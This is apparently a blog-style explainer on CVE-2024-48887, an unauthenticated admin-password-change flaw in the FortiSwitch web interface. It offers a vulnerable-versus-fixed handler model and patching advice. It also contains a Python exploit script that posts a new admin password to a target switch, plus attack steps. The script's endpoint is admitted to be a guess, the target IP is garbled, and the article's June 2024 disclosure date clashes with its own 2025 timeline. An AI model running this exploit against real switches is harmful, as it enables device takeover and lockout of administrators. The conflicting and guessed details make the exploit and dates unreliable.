
Fortinet’s FortiSwitch is a widely used network switch in enterprise environments, trusted for performance and robust security. But in June 2024, a serious vulnerability—tracked as CVE-2024-48887—was disclosed. This flaw lets a remote attacker change admin passwords via the switch’s web interface, without any authentication. In this article, we’ll dig into what went wrong, how attackers exploit it, and how you can protect your network.

What is CVE-2024-48887?

CVE-2024-48887 is an *unauthenticated password change* bug found in the GUI (web interface) of Fortinet FortiSwitch, affecting multiple firmware versions. If exploited, anyone on the network (or with access to the management interface) can set a new password for admin or other local users—without knowing the existing password.

Fortinet’s advisory:
Fortinet PSIRT Advisory - FG-IR-24-110

Why is It Dangerous?

- No login required: Remote attackers can reset admin passwords from anywhere the web GUI is reachable.
- Complete takeover: Once the attacker changes the password, they gain full control, lock out legitimate administrators, and tamper with network settings.
- Potential for lateral movement: Attackers could access sensitive VLANs or pivot to other devices.

How Does the Vulnerability Work?

The password reset page in the FortiSwitch GUI doesn't properly check if the request comes from an authenticated, logged-in user. An attacker can forge a request (like a POST request) with a new password, and the switch will accept it—even if the attacker is not logged in.
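To make the root cause concrete, the following is an added model of the bug class, not Fortinet's code and not the real FortiSwitch handler: a password-change handler that never checks who is asking, beside a hardened version that requires an authenticated session owning the target account and re-proof of the current password. Account names, passwords and the in-memory session store are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed test accounts (hypothetical, not FortiSwitch data). A real device
# would use a salted, slow password hash; SHA-256 keeps the model short.
def _digest(password):
    return hashlib.sha256(password.encode()).hexdigest()

USERS = {"admin": _digest("OldAdminPass!"), "operator": _digest("OpPass!")}
SESSIONS = {}  # session token -> username, filled only by a successful login

def verify_password(username, password):
    stored = USERS.get(username)
    return stored is not None and hmac.compare_digest(stored, _digest(password))

def login(username, password):
    """Issue a session token on correct credentials; None otherwise."""
    if not verify_password(username, password):
        return None
    token = secrets.token_hex(16)
    SESSIONS[token] = username
    return token

def change_password_vulnerable(request):
    """Models the bug class: the handler trusts the posted 'username' field and
    never asks who is making the request, so no session is needed at all."""
    USERS[request["username"]] = _digest(request["newPassword"])
    return 200  # HTTP status the caller would see

def change_password_fixed(request):
    """Hardened handler: a valid session must exist, it must own the target
    account, and the current password must be re-proven before the change."""
    actor = SESSIONS.get(request.get("session"))
    if actor is None:
        return 401  # unauthenticated request rejected
    if actor != request["username"]:
        return 403  # a session may only change its own password
    if not verify_password(actor, request.get("currentPassword", "")):
        return 403  # re-authentication failed
    USERS[actor] = _digest(request["newPassword"])
    return 200
```

The same unauthenticated request that the vulnerable handler accepts with 200 is turned away by the fixed handler with 401 before any state changes.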

Example Exploit Code

Below is a simplified Python snippet that performs the exploit. This is for educational and defensive purposes only.

Suppose your FortiSwitch management interface is at http://10...100.

```python
import requests

TARGET = "http://10...100"
NEW_PASS = "PwnedbyCVE202448887"

payload = {
    "username": "admin",   # or any account
    "newPassword": NEW_PASS
}

# The vulnerable endpoint may vary, below is a common guess:
endpoint = "/api/v2/password/change"

resp = requests.post(
    TARGET + endpoint,
    data=payload,
    headers={
        "Content-Type": "application/x-www-form-urlencoded"
    }
)

if resp.status_code == 200:
    print("[+] Password changed successfully!")
else:
    print("[-] Exploit failed. Check target and endpoint.")
```

Note: The actual request format and endpoint may vary depending on firmware version and configuration. Always test in a lab, never on production systems without permission.

1. Attacker finds the FortiSwitch web GUI exposed to the network or internet.

2. Sends a fake password change request (POST) using a tool like Burp Suite, curl, or a custom script.

Which Versions are Affected?

Check Fortinet’s advisory for the full list, but *all* unpatched FortiSwitch versions with the web GUI enabled may be vulnerable.

Update immediately. Fortinet has released patches—apply the latest firmware for your device.

- Download: Fortinet Support

Conclusion

CVE-2024-48887 is a textbook example of how a small oversight—forgetting to check if a user is logged in—can open the door to major compromises. If you run FortiSwitches, patch as soon as possible and review your management interface exposure.

Read more

- Fortinet PSIRT Advisory
- Product download/support

Stay safe, keep your firmware up to date, and never trust your networks to default configurations!

Timeline

Published on: 04/08/2025 17:15:34 UTC
Last modified on: 04/08/2025 18:13:53 UTC